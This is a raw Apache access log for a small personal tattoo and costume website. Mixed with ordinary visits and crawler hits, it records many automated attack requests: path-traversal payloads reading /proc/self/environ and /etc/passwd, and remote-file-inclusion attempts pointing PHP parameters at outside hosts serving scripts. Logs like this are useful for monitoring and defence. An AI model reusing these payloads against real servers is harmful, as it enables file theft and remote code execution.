81.21.79.214 - - [20/May/2010:01:18:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [20/May/2010:01:18:28 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
58.230.162.220 - - [20/May/2010:01:19:08 -0500] "GET /?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:19:08 -0500] "GET /logs/access_log.1264118400/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:19:08 -0500] "GET /logs/access_log.1265587200/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:19:08 -0500] "GET /logs/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:19:09 -0500] "GET /logs/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:19:09 -0500] "GET /logs/access_log.1264118400/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:19:09 -0500] "GET /?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:19:09 -0500] "GET /logs/access_log.1265587200/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.140.16.77 - - [20/May/2010:01:20:54 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.16.77 - - [20/May/2010:01:20:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
85.140.16.77 - - [20/May/2010:01:21:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
58.230.162.220 - - [20/May/2010:01:21:40 -0500] "GET /logs/access_log.1265587200/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:21:40 -0500] "GET /?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:21:40 -0500] "GET /logs/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:21:45 -0500] "GET /logs/access_log.1264118400/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:01:22:11 -0500] "GET /tattoo/links.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
125.248.34.130 - - [20/May/2010:01:22:32 -0500] "GET /logs/?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
125.248.34.130 - - [20/May/2010:01:22:32 -0500] "GET /?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
125.248.34.130 - - [20/May/2010:01:22:32 -0500] "GET /logs/access_log.1262822400/?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:01:25:01 -0500] "GET /logs/access_log.1202428800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
82.98.135.6 - - [20/May/2010:01:25:14 -0500] "GET /logs/access_log.1263427200//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
125.248.34.130 - - [20/May/2010:01:26:22 -0500] "GET /logs/?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
125.248.34.130 - - [20/May/2010:01:26:22 -0500] "GET /logs/access_log.1262822400/?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
125.248.34.130 - - [20/May/2010:01:26:22 -0500] "GET /?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
89.171.45.253 - - [20/May/2010:01:27:35 -0500] "GET /logs/access_log.1265414400//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
89.171.45.253 - - [20/May/2010:01:27:35 -0500] "GET /logs//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.171.45.253 - - [20/May/2010:01:27:35 -0500] "GET //bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.55.52.154 - - [20/May/2010:01:31:25 -0500] "GET /support/mailling/maillist/inc/initdb.php?absolute_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
74.55.52.154 - - [20/May/2010:01:31:25 -0500] "GET /logs/support/mailling/maillist/inc/initdb.php?absolute_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:01:31:33 -0500] "GET /logs/access_log.1170547200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.55.52.154 - - [20/May/2010:01:32:26 -0500] "GET /dotproject/modules/projects/vw_files.php?root_dir=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
74.55.52.154 - - [20/May/2010:01:32:26 -0500] "GET /logs/dotproject/modules/projects/vw_files.php?root_dir=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
188.122.78.2 - - [20/May/2010:01:34:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [20/May/2010:01:34:33 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
174.121.213.196 - - [20/May/2010:01:34:49 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
96.234.240.5 - - [20/May/2010:01:34:51 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&q=vintage+tattoo+flash&aq=f&aqi=g2g-m1&aql=&oq=&gs_rfai=""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:52 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:56 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:56 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:56 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:56 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:56 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:56 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:56 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:56 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:56 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:57 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:57 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
96.234.240.5 - - [20/May/2010:01:34:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&q=vintage+tattoo+flash&aq=f&aqi=g2g-m1&aql=&oq=&gs_rfai=""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.19) Gecko/2010031218 Firefox/3.0.19"
211.239.161.143 - - [20/May/2010:01:35:53 -0500] "GET /e107/e107_handlers/secure_img_render.php?p=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
211.239.161.143 - - [20/May/2010:01:35:54 -0500] "GET /logs/e107/e107_handlers/secure_img_render.php?p=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
207.46.199.50 - - [20/May/2010:01:36:06 -0500] "GET /logs/access_log.1259712000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.171.45.253 - - [20/May/2010:01:36:07 -0500] "GET /logs/access_log.1263427200//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:01:36:34 -0500] "GET /logs/?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:01:36:34 -0500] "GET /?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:01:36:35 -0500] "GET /logs/access_log.1262822400/?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.46.195.223 - - [20/May/2010:01:36:35 -0500] "GET /logs/access_log.1224201600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.109.108.186 - - [20/May/2010:01:36:37 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:01:36:37 -0500] "GET /logs/access_log.1272844800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:01:36:37 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:01:37:05 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:01:37:17 -0500] "GET /logs/access_log.1194307200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
210.109.108.186 - - [20/May/2010:01:38:02 -0500] "GET /logs/access_log.1272844800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
81.21.79.214 - - [20/May/2010:01:38:16 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [20/May/2010:01:38:16 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [20/May/2010:01:38:17 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
210.109.108.186 - - [20/May/2010:01:38:22 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
207.46.13.49 - - [20/May/2010:01:38:34 -0500] "GET /logs/access_log.1154563200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.21.79.214 - - [20/May/2010:01:40:46 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.160.120.204 - - [20/May/2010:01:40:56 -0500] "GET /logs/access_log.1273363200/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""libwww-perl/5.805"
213.160.120.204 - - [20/May/2010:01:40:56 -0500] "GET /shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""libwww-perl/5.805"
213.160.120.204 - - [20/May/2010:01:40:57 -0500] "GET /logs/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 310 "-""libwww-perl/5.805"
65.182.191.100 - - [20/May/2010:01:41:15 -0500] "GET /logs/access_log.1273363200/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""libwww-perl/5.811"
65.182.191.100 - - [20/May/2010:01:41:15 -0500] "GET /shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""libwww-perl/5.811"
65.182.191.100 - - [20/May/2010:01:41:15 -0500] "GET /logs/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 310 "-""libwww-perl/5.811"
69.168.54.22 - - [20/May/2010:01:41:19 -0500] "GET /logs/access_log.1273363200/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""libwww-perl/5.805"
69.168.54.22 - - [20/May/2010:01:41:19 -0500] "GET /shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""libwww-perl/5.805"
69.168.54.22 - - [20/May/2010:01:41:19 -0500] "GET /logs/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 310 "-""libwww-perl/5.805"
74.54.52.210 - - [20/May/2010:01:41:34 -0500] "GET /logs/access_log.1273363200/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""libwww-perl/5.810"
74.54.52.210 - - [20/May/2010:01:41:34 -0500] "GET /shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""libwww-perl/5.810"
74.54.52.210 - - [20/May/2010:01:41:34 -0500] "GET /logs/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 310 "-""libwww-perl/5.810"
74.54.52.210 - - [20/May/2010:01:42:26 -0500] "GET /logs/access_log.1273363200/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""libwww-perl/5.810"
74.54.52.210 - - [20/May/2010:01:42:26 -0500] "GET /shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""libwww-perl/5.810"
74.54.52.210 - - [20/May/2010:01:42:26 -0500] "GET /logs/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 310 "-""libwww-perl/5.810"
188.122.78.2 - - [20/May/2010:01:42:30 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.122.78.2 - - [20/May/2010:01:42:31 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.122.78.2 - - [20/May/2010:01:42:31 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
65.182.191.100 - - [20/May/2010:01:42:35 -0500] "GET /logs/access_log.1273363200/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""libwww-perl/5.811"
65.182.191.100 - - [20/May/2010:01:42:35 -0500] "GET /shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""libwww-perl/5.811"
65.182.191.100 - - [20/May/2010:01:42:35 -0500] "GET /logs/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 310 "-""libwww-perl/5.811"
87.250.255.243 - - [20/May/2010:01:42:52 -0500] "GET /logs/access_log.1164499200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.132.224.66 - - [20/May/2010:01:43:34 -0500] "GET ///?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1004 "-""libwww-perl/5.823"
188.122.78.2 - - [20/May/2010:01:44:43 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
174.121.213.196 - - [20/May/2010:01:47:09 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.213.196 - - [20/May/2010:01:47:09 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.213.196 - - [20/May/2010:01:47:09 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.213.196 - - [20/May/2010:01:47:29 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.213.196 - - [20/May/2010:01:47:29 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.213.196 - - [20/May/2010:01:47:29 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
87.250.255.243 - - [20/May/2010:01:47:33 -0500] "GET /logs/access_log.1184889600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.121.213.196 - - [20/May/2010:01:48:07 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
196.35.158.182 - - [20/May/2010:01:49:02 -0500] "GET /logs/access_log.1273363200/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""libwww-perl/5.834"
196.35.158.182 - - [20/May/2010:01:49:02 -0500] "GET /shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""libwww-perl/5.834"
196.35.158.182 - - [20/May/2010:01:49:03 -0500] "GET /logs/shoutbox/expanded.php?conf=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 310 "-""libwww-perl/5.834"
211.174.62.150 - - [20/May/2010:01:50:45 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.174.62.150 - - [20/May/2010:01:50:45 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6278 "-""Mozilla/5.0"
211.174.62.150 - - [20/May/2010:01:50:45 -0500] "GET /logs/access_log.1272844800%20%20//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.174.62.150 - - [20/May/2010:01:51:48 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.174.62.150 - - [20/May/2010:01:51:48 -0500] "GET /logs/access_log.1272844800//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.174.62.150 - - [20/May/2010:01:51:48 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6278 "-""Mozilla/5.0"
207.46.13.100 - - [20/May/2010:01:52:35 -0500] "GET /logs/access_log.1254614400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
